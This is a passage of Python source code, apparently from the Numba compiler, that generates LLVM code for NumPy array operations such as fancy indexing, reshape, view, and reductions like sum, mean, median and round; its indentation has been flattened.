aryty, idxty, valty = sig.args
ary, idx, val = args
if isinstance(idxty, types.BaseTuple):
index_types = idxty.types
indices = cgutils.unpack_tuple(builder, idx, count=len(idxty))
else:
index_types = (idxty,)
indices = (idx,)
ary = make_array(aryty)(context, builder, ary)
# First try basic indexing to see if a single array location is denoted.
try:
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
except NotImplementedError:
use_fancy_indexing = True
else:
use_fancy_indexing = bool(shapes)
if use_fancy_indexing:
# Index describes a non-trivial view => use generic slice assignment
# (NOTE: this also handles scalar broadcasting)
return fancy_setslice(context, builder, sig, args,
index_types, indices)
# Store source value the given location
val = context.cast(builder, val, valty, aryty.dtype)
store_item(context, builder, aryty, val, dataptr)
@builtin
@implement(types.len_type, types.Kind(types.Buffer))
def array_len(context, builder, sig, args):
(aryty,) = sig.args
(ary,) = args
arystty = make_array(aryty)
ary = arystty(context, builder, ary)
shapeary = ary.shape
res = builder.extract_value(shapeary, 0)
return impl_ret_untracked(context, builder, sig.return_type, res)
#-------------------------------------------------------------------------------
# Advanced / fancy indexing
class Indexer(object):
"""
Generic indexer interface, for generating indices over a fancy indexed
array on a single dimension.
"""
def prepare(self):
"""
Prepare the indexer by initializing any required variables, basic
blocks...
"""
raise NotImplementedError
def get_size(self):
"""
Return this dimension's size as an integer.
"""
raise NotImplementedError
def get_shape(self):
"""
Return this dimension's shape as a tuple.
"""
raise NotImplementedError
def loop_head(self):
"""
Start indexation loop. Return a (index, count) tuple.
*index* is an integer LLVM value representing the index over this
dimension.
*count* is either an integer LLVM value representing the current
iteration count, or None if this dimension should be omitted from
the indexation result.
"""
raise NotImplementedError
def loop_tail(self):
"""
Finish indexation loop.
"""
raise NotImplementedError
class EntireIndexer(Indexer):
"""
Compute indices along an entire array dimension.
"""
def __init__(self, context, builder, aryty, ary, dim):
self.context = context
self.builder = builder
self.aryty = aryty
self.ary = ary
self.dim = dim
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
builder = self.builder
self.size = builder.extract_value(self.ary.shape, self.dim)
self.index = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return self.size
def get_shape(self):
return (self.size,)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(Constant.int(self.ll_intp, 0), self.index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.index)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.size),
likely=False):
builder.branch(self.bb_end)
return cur_index, cur_index
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.index),
self.context.get_constant(types.intp, 1))
builder.store(next_index, self.index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class IntegerIndexer(Indexer):
"""
Compute indices from a single integer.
"""
def __init__(self, context, builder, idx):
self.context = context
self.builder = builder
self.idx = idx
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
pass
def get_size(self):
return Constant.int(self.ll_intp, 1)
def get_shape(self):
return ()
def loop_head(self):
return self.idx, None
def loop_tail(self):
pass
class IntegerArrayIndexer(Indexer):
"""
Compute indices from an array of integer indices.
"""
def __init__(self, context, builder, idxty, idxary, size):
self.context = context
self.builder = builder
self.idxty = idxty
self.idxary = idxary
self.size = size
assert idxty.ndim == 1
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
builder = self.builder
self.idx_size = cgutils.unpack_tuple(builder, self.idxary.shape)[0]
self.idx_index = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return self.idx_size
def get_shape(self):
return (self.idx_size,)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(Constant.int(self.ll_intp, 0), self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.idx_index)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.idx_size),
likely=False):
builder.branch(self.bb_end)
# Load the actual index from the array of indices
index = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
cur_index, wraparound=False)
index = fix_integer_index(self.context, builder,
self.idxty.dtype, index, self.size)
return index, cur_index
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.idx_index),
Constant.int(self.ll_intp, 1))
builder.store(next_index, self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class BooleanArrayIndexer(Indexer):
"""
Compute indices from an array of boolean predicates.
"""
def __init__(self, context, builder, idxty, idxary):
self.context = context
self.builder = builder
self.idxty = idxty
self.idxary = idxary
assert idxty.ndim == 1
self.ll_intp = self.context.get_value_type(types.intp)
self.zero = Constant.int(self.ll_intp, 0)
self.one = Constant.int(self.ll_intp, 1)
def prepare(self):
builder = self.builder
self.size = cgutils.unpack_tuple(builder, self.idxary.shape)[0]
self.idx_index = cgutils.alloca_once(builder, self.ll_intp)
self.count = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_tail = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
builder = self.builder
count = cgutils.alloca_once_value(builder, self.zero)
# Sum all true values
with cgutils.for_range(builder, self.size) as loop:
c = builder.load(count)
pred = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
loop.index, wraparound=False)
c = builder.add(c, builder.zext(pred, c.type))
builder.store(c, count)
return builder.load(count)
def get_shape(self):
return (self.get_size(),)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(self.zero, self.idx_index)
self.builder.store(self.zero, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.idx_index)
cur_count = builder.load(self.count)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.size),
likely=False):
builder.branch(self.bb_end)
# Load the predicate and branch if false
pred = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
cur_index, wraparound=False)
with builder.if_then(builder.not_(pred)):
builder.branch(self.bb_tail)
# Increment the count for next iteration
next_count = builder.add(cur_count, self.one)
builder.store(next_count, self.count)
return cur_index, cur_count
def loop_tail(self):
builder = self.builder
builder.branch(self.bb_tail)
builder.position_at_end(self.bb_tail)
next_index = builder.add(builder.load(self.idx_index), self.one)
builder.store(next_index, self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class SliceIndexer(Indexer):
"""
Compute indices along a slice.
"""
def __init__(self, context, builder, aryty, ary, dim, slice):
self.context = context
self.builder = builder
self.aryty = aryty
self.ary = ary
self.dim = dim
self.slice = slice
self.ll_intp = self.context.get_value_type(types.intp)
self.zero = Constant.int(self.ll_intp, 0)
self.one = Constant.int(self.ll_intp, 1)
def prepare(self):
builder = self.builder
# Fix slice for the dimension's size
self.dim_size = builder.extract_value(self.ary.shape, self.dim)
cgutils.guard_invalid_slice(self.context, builder, self.slice)
slicing.fix_slice(builder, self.slice, self.dim_size)
self.is_step_negative = cgutils.is_neg_int(builder, self.slice.step)
# Create loop entities
self.index = cgutils.alloca_once(builder, self.ll_intp)
self.count = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return slicing.get_slice_length(self.builder, self.slice)
def get_shape(self):
return (self.get_size(),)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(self.slice.start, self.index)
self.builder.store(self.zero, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.index)
cur_count = builder.load(self.count)
is_finished = builder.select(self.is_step_negative,
builder.icmp_signed('<=', cur_index,
self.slice.stop),
builder.icmp_signed('>=', cur_index,
self.slice.stop))
with builder.if_then(is_finished, likely=False):
builder.branch(self.bb_end)
return cur_index, cur_count
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.index), self.slice.step)
builder.store(next_index, self.index)
next_count = builder.add(builder.load(self.count), self.one)
builder.store(next_count, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class FancyIndexer(object):
"""
Perform fancy indexing on the given array.
"""
def __init__(self, context, builder, aryty, ary, index_types, indices):
self.context = context
self.builder = builder
self.aryty = ary
self.shapes = cgutils.unpack_tuple(builder, ary.shape, aryty.ndim)
self.strides = cgutils.unpack_tuple(builder, ary.strides, aryty.ndim)
indexers = []
ax = 0
for indexval, idxty in zip(indices, index_types):
if idxty is types.ellipsis:
# Fill up missing dimensions at the middle
n_missing = aryty.ndim - len(indices) + 1
for i in range(n_missing):
indexer = EntireIndexer(context, builder, aryty, ary, ax)
indexers.append(indexer)
ax += 1
continue
# Regular index value
if idxty == types.slice3_type:
slice = slicing.Slice(context, builder, value=indexval)
indexer = SliceIndexer(context, builder, aryty, ary, ax, slice)
indexers.append(indexer)
elif isinstance(idxty, types.Integer):
ind = fix_integer_index(context, builder, idxty, indexval,
self.shapes[ax])
indexer = IntegerIndexer(context, builder, ind)
indexers.append(indexer)
elif isinstance(idxty, types.Array):
idxary = make_array(idxty)(context, builder, indexval)
if isinstance(idxty.dtype, types.Integer):
indexer = IntegerArrayIndexer(context, builder,
idxty, idxary,
self.shapes[ax])
elif isinstance(idxty.dtype, types.Boolean):
indexer = BooleanArrayIndexer(context, builder,
idxty, idxary)
else:
assert 0
indexers.append(indexer)
else:
raise AssertionError("unexpected index type: %s" % (idxty,))
ax += 1
# Fill up missing dimensions at the end
assert ax <= aryty.ndim, (ax, aryty.ndim)
while ax < aryty.ndim:
indexer = EntireIndexer(context, builder, aryty, ary, ax)
indexers.append(indexer)
ax += 1
assert len(indexers) == aryty.ndim, (len(indexers), aryty.ndim)
self.indexers = indexers
def prepare(self):
for i in self.indexers:
i.prepare()
def get_shape(self):
"""
Get the resulting shape as Python tuple.
"""
return sum([i.get_shape() for i in self.indexers], ())
def begin_loops(self):
indices, counts = zip(*(i.loop_head() for i in self.indexers))
return indices, counts
def end_loops(self):
for i in reversed(self.indexers):
i.loop_tail()
def fancy_getitem(context, builder, sig, args,
aryty, ary, index_types, indices):
shapes = cgutils.unpack_tuple(builder, ary.shape)
strides = cgutils.unpack_tuple(builder, ary.strides)
data = ary.data
indexer = FancyIndexer(context, builder, aryty, ary,
index_types, indices)
indexer.prepare()
# Construct output array
out_ty = sig.return_type
out_shapes = indexer.get_shape()
out = _empty_nd_impl(context, builder, out_ty, out_shapes)
out_data = out.data
out_idx = cgutils.alloca_once_value(builder,
context.get_constant(types.intp, 0))
# Loop on source and copy to destination
indices, _ = indexer.begin_loops()
# No need to check for wraparound, as the indexers all ensure
# a positive index is returned.
ptr = cgutils.get_item_pointer2(builder, data, shapes, strides,
aryty.layout, indices, wraparound=False)
val = load_item(context, builder, aryty, ptr)
# Since the destination is C-contiguous, no need for multi-dimensional
# indexing.
cur = builder.load(out_idx)
ptr = builder.gep(out_data, [cur])
store_item(context, builder, out_ty, val, ptr)
next_idx = builder.add(cur, context.get_constant(types.intp, 1))
builder.store(next_idx, out_idx)
indexer.end_loops()
return impl_ret_new_ref(context, builder, out_ty, out._getvalue())
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.Array))
def fancy_getitem_array(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, ary)
out_ty = sig.return_type
return fancy_getitem(context, builder, sig, args,
aryty, ary, (idxty,), (idx,))
def fancy_setslice(context, builder, sig, args, index_types, indices):
"""
Implement slice assignment for arrays. This implementation works for
basic as well as fancy indexing, since there's no functional difference
between the two for indexed assignment.
"""
aryty, _, srcty = sig.args
ary, _, src = args
ary = make_array(aryty)(context, builder, ary)
dest_shapes = cgutils.unpack_tuple(builder, ary.shape)
dest_strides = cgutils.unpack_tuple(builder, ary.strides)
dest_data = ary.data
indexer = FancyIndexer(context, builder, aryty, ary,
index_types, indices)
indexer.prepare()
if isinstance(srcty, types.Buffer):
# Source is an array
src = make_array(srcty)(context, builder, src)
src_shapes = cgutils.unpack_tuple(builder, src.shape)
src_strides = cgutils.unpack_tuple(builder, src.strides)
src_data = src.data
src_dtype = srcty.dtype
# Check shapes are equal
index_shape = indexer.get_shape()
shape_error = cgutils.false_bit
assert len(index_shape) == len(src_shapes)
for u, v in zip(src_shapes, index_shape):
shape_error = builder.or_(shape_error,
builder.icmp_signed('!=', u, v))
with builder.if_then(shape_error, likely=False):
msg = "cannot assign slice from input of different size"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
def src_getitem(source_indices):
assert len(source_indices) == srcty.ndim
src_ptr = cgutils.get_item_pointer2(builder, src_data,
src_shapes, src_strides,
srcty.layout, source_indices,
wraparound=False)
return load_item(context, builder, srcty, src_ptr)
else:
# Source is a scalar (broadcast or not, depending on destination
# shape).
src_dtype = srcty
def src_getitem(source_indices):
return src
# Loop on destination and copy from source to destination
dest_indices, counts = indexer.begin_loops()
# Source is iterated in natural order
source_indices = tuple(c for c in counts if c is not None)
val = src_getitem(source_indices)
# Cast to the destination dtype (cross-dtype slice assignement is allowed)
val = context.cast(builder, val, src_dtype, aryty.dtype)
# No need to check for wraparound, as the indexers all ensure
# a positive index is returned.
dest_ptr = cgutils.get_item_pointer2(builder, dest_data,
dest_shapes, dest_strides,
aryty.layout, dest_indices,
wraparound=False)
store_item(context, builder, aryty, val, dest_ptr)
indexer.end_loops()
return context.get_dummy_value()
#-------------------------------------------------------------------------------
# Shape / layout altering
@builtin
@implement('array.transpose', types.Kind(types.Array))
def array_transpose(context, builder, sig, args):
return array_T(context, builder, sig.args[0], args[0])
def array_T(context, builder, typ, value):
if typ.ndim <= 1:
res = value
else:
ary = make_array(typ)(context, builder, value)
ret = make_array(typ)(context, builder)
shapes = cgutils.unpack_tuple(builder, ary.shape, typ.ndim)
strides = cgutils.unpack_tuple(builder, ary.strides, typ.ndim)
populate_array(ret,
data=ary.data,
shape=cgutils.pack_array(builder, shapes[::-1]),
strides=cgutils.pack_array(builder, strides[::-1]),
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
res = ret._getvalue()
return impl_ret_borrowed(context, builder, typ, res)
builtin_attr(impl_attribute(types.Kind(types.Array), 'T')(array_T))
def _attempt_nocopy_reshape(context, builder, aryty, ary, newnd, newshape,
newstrides):
"""
Call into Numba_attempt_nocopy_reshape() for the given array type
and instance, and the specified new shape. The array pointed to
by *newstrides* will be filled up if successful.
"""
ll_intp = context.get_value_type(types.intp)
ll_intp_star = ll_intp.as_pointer()
ll_intc = context.get_value_type(types.intc)
fnty = lc.Type.function(ll_intc, [ll_intp, ll_intp_star, ll_intp_star,
ll_intp, ll_intp_star, ll_intp_star,
ll_intp, ll_intc])
fn = builder.module.get_or_insert_function(
fnty, name="numba_attempt_nocopy_reshape")
nd = lc.Constant.int(ll_intp, aryty.ndim)
shape = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('shape'), 0, 0)
strides = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('strides'), 0, 0)
newnd = lc.Constant.int(ll_intp, newnd)
newshape = cgutils.gep_inbounds(builder, newshape, 0, 0)
newstrides = cgutils.gep_inbounds(builder, newstrides, 0, 0)
is_f_order = lc.Constant.int(ll_intc, 0)
res = builder.call(fn, [nd, shape, strides,
newnd, newshape, newstrides,
ary.itemsize, is_f_order])
return res
@builtin
@implement('array.reshape', types.Kind(types.Array), types.Kind(types.BaseTuple))
def array_reshape(context, builder, sig, args):
aryty = sig.args[0]
retty = sig.return_type
shapety = sig.args[1]
shape = args[1]
ll_intp = context.get_value_type(types.intp)
ll_shape = lc.Type.array(ll_intp, shapety.count)
ary = make_array(aryty)(context, builder, args[0])
# XXX unknown dimension (-1) is unhandled
# Check requested size
newsize = lc.Constant.int(ll_intp, 1)
for s in cgutils.unpack_tuple(builder, shape):
newsize = builder.mul(newsize, s)
size = lc.Constant.int(ll_intp, 1)
for s in cgutils.unpack_tuple(builder, ary.shape):
size = builder.mul(size, s)
fail = builder.icmp_unsigned('!=', size, newsize)
with builder.if_then(fail):
msg = "total size of new array must be unchanged"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
newnd = shapety.count
newshape = cgutils.alloca_once(builder, ll_shape)
builder.store(shape, newshape)
newstrides = cgutils.alloca_once(builder, ll_shape)
ok = _attempt_nocopy_reshape(context, builder, aryty, ary, newnd,
newshape, newstrides)
fail = builder.icmp_unsigned('==', ok, lc.Constant.int(ok.type, 0))
with builder.if_then(fail):
msg = "incompatible shape for array"
context.call_conv.return_user_exc(builder, NotImplementedError, (msg,))
ret = make_array(retty)(context, builder)
populate_array(ret,
data=ary.data,
shape=builder.load(newshape),
strides=builder.load(newstrides),
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
res = ret._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
def _change_dtype(context, builder, oldty, newty, ary):
"""
Attempt to fix up *ary* for switching from *oldty* to *newty*.
See Numpy's array_descr_set()
(np/core/src/multiarray/getset.c).
Attempt to fix the array's shape and strides for a new dtype.
False is returned on failure, True on success.
"""
assert oldty.ndim == newty.ndim
assert oldty.layout == newty.layout
new_layout = ord(newty.layout)
any_layout = ord('A')
c_layout = ord('C')
f_layout = ord('F')
int8 = types.int8
def imp(nd, dims, strides, old_itemsize, new_itemsize, layout):
# Attempt to update the layout due to limitation of the numba
# type system.
if layout == any_layout:
# Test rightmost stride to be contiguous
if strides[-1] == old_itemsize:
# Process this as if it is C contiguous
layout = int8(c_layout)
# Test leftmost stride to be F contiguous
elif strides[0] == old_itemsize:
# Process this as if it is F contiguous
layout = int8(f_layout)
if old_itemsize != new_itemsize and (layout == any_layout or nd == 0):
return False
if layout == c_layout:
i = nd - 1
else:
i = 0
if new_itemsize < old_itemsize:
# If it is compatible, increase the size of the dimension
# at the end (or at the front if F-contiguous)
if (old_itemsize % new_itemsize) != 0:
return False
newdim = old_itemsize // new_itemsize
dims[i] *= newdim
strides[i] = new_itemsize
elif new_itemsize > old_itemsize:
# Determine if last (or first if F-contiguous) dimension
# is compatible
bytelength = dims[i] * old_itemsize
if (bytelength % new_itemsize) != 0:
return False
dims[i] = bytelength // new_itemsize
strides[i] = new_itemsize
else:
# Same item size: nothing to do (this also works for
# non-contiguous arrays).
pass
return True
old_itemsize = context.get_constant(types.intp,
get_itemsize(context, oldty))
new_itemsize = context.get_constant(types.intp,
get_itemsize(context, newty))
nd = context.get_constant(types.intp, newty.ndim)
shape_data = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('shape'),
0, 0)
strides_data = cgutils.gep_inbounds(builder,
ary._get_ptr_by_name('strides'), 0, 0)
shape_strides_array_type = types.Array(dtype=types.intp, ndim=1, layout='C')
arycls = context.make_array(shape_strides_array_type)
shape_constant = cgutils.pack_array(builder,
[context.get_constant(types.intp,
newty.ndim)])
sizeof_intp = context.get_abi_sizeof(context.get_data_type(types.intp))
sizeof_intp = context.get_constant(types.intp, sizeof_intp)
strides_constant = cgutils.pack_array(builder, [sizeof_intp])
shape_ary = arycls(context, builder)
populate_array(shape_ary,
data=shape_data,
shape=shape_constant,
strides=strides_constant,
itemsize=sizeof_intp,
meminfo=None)
strides_ary = arycls(context, builder)
populate_array(strides_ary,
data=strides_data,
shape=shape_constant,
strides=strides_constant,
itemsize=sizeof_intp,
meminfo=None)
shape = shape_ary._getvalue()
strides = strides_ary._getvalue()
args = [nd, shape, strides, old_itemsize, new_itemsize,
context.get_constant(types.int8, new_layout)]
sig = signature(types.boolean,
types.intp, # nd
shape_strides_array_type, # dims
shape_strides_array_type, # strides
types.intp, # old_itemsize
types.intp, # new_itemsize
types.int8, # layout
)
res = context.compile_internal(builder, imp, sig, args)
update_array_info(newty, ary)
res = impl_ret_borrowed(context, builder, sig.return_type, res)
return res
@builtin
@implement('array.view', types.Kind(types.Array), types.Kind(types.DTypeSpec))
def array_view(context, builder, sig, args):
aryty = sig.args[0]
retty = sig.return_type
ary = make_array(aryty)(context, builder, args[0])
ret = make_array(retty)(context, builder)
# Copy all fields, casting the "data" pointer appropriately
fields = set(ret._datamodel._fields)
for k in sorted(fields):
val = getattr(ary, k)
if k == 'data':
ptrty = ret.data.type
ret.data = builder.bitcast(val, ptrty)
else:
setattr(ret, k, val)
ok = _change_dtype(context, builder, aryty, retty, ret)
fail = builder.icmp_unsigned('==', ok, lc.Constant.int(ok.type, 0))
with builder.if_then(fail):
msg = "new type not compatible with array"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
res = ret._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
#-------------------------------------------------------------------------------
# Computations
@builtin
@implement(numpy.sum, types.Kind(types.Array))
@implement("array.sum", types.Kind(types.Array))
def array_sum(context, builder, sig, args):
zero = sig.return_type(0)
def array_sum_impl(arr):
c = zero
for v in arr.flat:
c += v
return c
res = context.compile_internal(builder, array_sum_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.prod, types.Kind(types.Array))
@implement("array.prod", types.Kind(types.Array))
def array_prod(context, builder, sig, args):
def array_prod_impl(arr):
c = 1
for v in arr.flat:
c *= v
return c
res = context.compile_internal(builder, array_prod_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.cumsum, types.Kind(types.Array))
@implement("array.cumsum", types.Kind(types.Array))
def array_cumsum(context, builder, sig, args):
scalar_dtype = sig.return_type.dtype
dtype = as_dtype(scalar_dtype)
zero = scalar_dtype(0)
def array_cumsum_impl(arr):
size = 1
for i in arr.shape:
size = size * i
out = numpy.empty(size, dtype)
c = zero
for idx, v in enumerate(arr.flat):
c += v
out[idx] = c
return out
res = context.compile_internal(builder, array_cumsum_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.cumprod, types.Kind(types.Array))
@implement("array.cumprod", types.Kind(types.Array))
def array_cumprod(context, builder, sig, args):
scalar_dtype = sig.return_type.dtype
dtype = as_dtype(scalar_dtype)
def array_cumprod_impl(arr):
size = 1
for i in arr.shape:
size = size * i
out = numpy.empty(size, dtype)
c = 1
for idx, v in enumerate(arr.flat):
c *= v
out[idx] = c
return out
res = context.compile_internal(builder, array_cumprod_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.mean, types.Kind(types.Array))
@implement("array.mean", types.Kind(types.Array))
def array_mean(context, builder, sig, args):
zero = sig.return_type(0)
def array_mean_impl(arr):
# Can't use the naive `arr.sum() / arr.size`, as it would return
# a wrong result on integer sum overflow.
c = zero
for v in arr.flat:
c += v
return c / arr.size
res = context.compile_internal(builder, array_mean_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.var, types.Kind(types.Array))
@implement("array.var", types.Kind(types.Array))
def array_var(context, builder, sig, args):
def array_var_impl(arry):
# Compute the mean
m = arry.mean()
# Compute the sum of square diffs
ssd = 0
for v in arry.flat:
ssd += (v - m) ** 2
return ssd / arry.size
res = context.compile_internal(builder, array_var_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.std, types.Kind(types.Array))
@implement("array.std", types.Kind(types.Array))
def array_std(context, builder, sig, args):
def array_std_impl(arry):
return arry.var() ** 0.5
res = context.compile_internal(builder, array_std_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.min, types.Kind(types.Array))
@implement("array.min", types.Kind(types.Array))
def array_min(context, builder, sig, args):
ty = sig.args[0].dtype
if isinstance(ty, (types.NPDatetime, types.NPTimedelta)):
# NaT is smaller than every other value, but it is
# ignored as far as min() is concerned.
nat = ty('NaT')
def array_min_impl(arry):
min_value = nat
it = arry.flat
for v in it:
if v != nat:
min_value = v
break
for v in it:
if v != nat and v < min_value:
min_value = v
return min_value
else:
def array_min_impl(arry):
for v in arry.flat:
min_value = v
break
for v in arry.flat:
if v < min_value:
min_value = v
return min_value
res = context.compile_internal(builder, array_min_impl, sig, args)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.max, types.Kind(types.Array))
@implement("array.max", types.Kind(types.Array))
def array_max(context, builder, sig, args):
def array_max_impl(arry):
for v in arry.flat:
max_value = v
break
for v in arry.flat:
if v > max_value:
max_value = v
return max_value
res = context.compile_internal(builder, array_max_impl, sig, args)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.argmin, types.Kind(types.Array))
@implement("array.argmin", types.Kind(types.Array))
def array_argmin(context, builder, sig, args):
ty = sig.args[0].dtype
# NOTE: Under Numpy < 1.10, argmin() is inconsistent with min() on NaT values:
# https://github.com/numpy/numpy/issues/6030
if (numpy_version >= (1, 10) and
isinstance(ty, (types.NPDatetime, types.NPTimedelta))):
# NaT is smaller than every other value, but it is
# ignored as far as argmin() is concerned.
nat = ty('NaT')
def array_argmin_impl(arry):
min_value = nat
min_idx = 0
it = arry.flat
idx = 0
for v in it:
if v != nat:
min_value = v
min_idx = idx
idx += 1
break
idx += 1
for v in it:
if v != nat and v < min_value:
min_value = v
min_idx = idx
idx += 1
return min_idx
else:
def array_argmin_impl(arry):
for v in arry.flat:
min_value = v
min_idx = 0
break
idx = 0
for v in arry.flat:
if v < min_value:
min_value = v
min_idx = idx
idx += 1
return min_idx
res = context.compile_internal(builder, array_argmin_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.argmax, types.Kind(types.Array))
@implement("array.argmax", types.Kind(types.Array))
def array_argmax(context, builder, sig, args):
def array_argmax_impl(arry):
for v in arry.flat:
max_value = v
max_idx = 0
break
idx = 0
for v in arry.flat:
if v > max_value:
max_value = v
max_idx = idx
idx += 1
return max_idx
res = context.compile_internal(builder, array_argmax_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.median, types.Kind(types.Array))
def array_median(context, builder, sig, args):
def partition(A, low, high):
mid = (low+high) // 2
# median of three {low, middle, high}
LM = A[low] <= A[mid]
MH = A[mid] <= A[high]
LH = A[low] <= A[high]
if LM == MH:
median3 = mid
elif LH != LM:
median3 = low
else:
median3 = high
# choose median3 as the pivot
A[high], A[median3] = A[median3], A[high]
x = A[high]
i = low
for j in range(low, high):
if A[j] <= x:
A[i], A[j] = A[j], A[i]
i += 1
A[i], A[high] = A[high], A[i]
return i
sig_partition = typing.signature(types.intp, *(sig.args[0], types.intp, types.intp))
_partition = context.compile_subroutine(builder, partition, sig_partition)
def select(arry, k):
n = arry.shape[0]
# XXX: assuming flat array till array.flatten is implemented
# temp_arry = arry.flatten()
temp_arry = arry.copy()
high = n-1
low = 0
# NOTE: high is inclusive
i = _partition(temp_arry, low, high)
while i != k:
if i < k:
low = i+1
i = _partition(temp_arry, low, high)
else:
high = i-1
i = _partition(temp_arry, low, high)
return temp_arry[k]
sig_select = typing.signature(sig.args[0].dtype, *(sig.args[0], types.intp))
_select = context.compile_subroutine(builder, select, sig_select)
def median(arry):
n = arry.shape[0]
if n % 2 == 0:
return (_select(arry, n//2 - 1) + _select(arry, n//2))/2
else:
return _select(arry, n//2)
res = context.compile_internal(builder, median, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
def _np_round_intrinsic(tp):
# np.round() always rounds half to even
return "llvm.rint.f%d" % (tp.bitwidth,)
def _np_round_float(context, builder, tp, val):
llty = context.get_value_type(tp)
module = builder.module
fnty = lc.Type.function(llty, [llty])
fn = module.get_or_insert_function(fnty, name=_np_round_intrinsic(tp))
return builder.call(fn, (val,))
@builtin
@implement(numpy.round, types.Kind(types.Float))
def scalar_round_unary(context, builder, sig, args):
res = _np_round_float(context, builder, sig.args[0], args[0])
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Integer))
def scalar_round_unary(context, builder, sig, args):
res = args[0]
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Complex))
def scalar_round_unary_complex(context, builder, sig, args):
fltty = sig.args[0].underlying_float
cplx_cls = context.make_complex(sig.args[0])
z = cplx_cls(context, builder, args[0])
z.real = _np_round_float(context, builder, fltty, z.real)
z.imag = _np_round_float(context, builder, fltty, z.imag)
res = z._getvalue()
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Float), types.Kind(types.Integer))
@implement(numpy.round, types.Kind(types.Integer), types.Kind(types.Integer))
def scalar_round_binary_float(context, builder, sig, args):
def round_ndigits(x, ndigits):
if math.isinf(x) or math.isnan(x):
return x
# NOTE: this is CPython's algorithm, but perhaps this is overkill
# when emulating Numpy's behaviour.
if ndigits >= 0:
if ndigits > 22:
# pow1 and pow2 are each safe from overflow, but
# pow1*pow2 ~= pow(10.0, ndigits) might overflow.
pow1 = 10.0 ** (ndigits - 22)
pow2 = 1e22
else:
pow1 = 10.0 ** ndigits
pow2 = 1.0
y = (x * pow1) * pow2
if math.isinf(y):
return x
return (numpy.round(y) / pow2) / pow1
else:
pow1 = 10.0 ** (-ndigits)
y = x / pow1
return numpy.round(y) * pow1
res = context.compile_internal(builder, round_ndigits, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Complex), types.Kind(types.Integer))
def scalar_round_binary_complex(context, builder, sig, args):
def round_ndigits(z, ndigits):
return complex(numpy.round(z.real, ndigits),
numpy.round(z.imag, ndigits))
res = context.compile_internal(builder, round_ndigits, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Array), types.Kind(types.Integer),
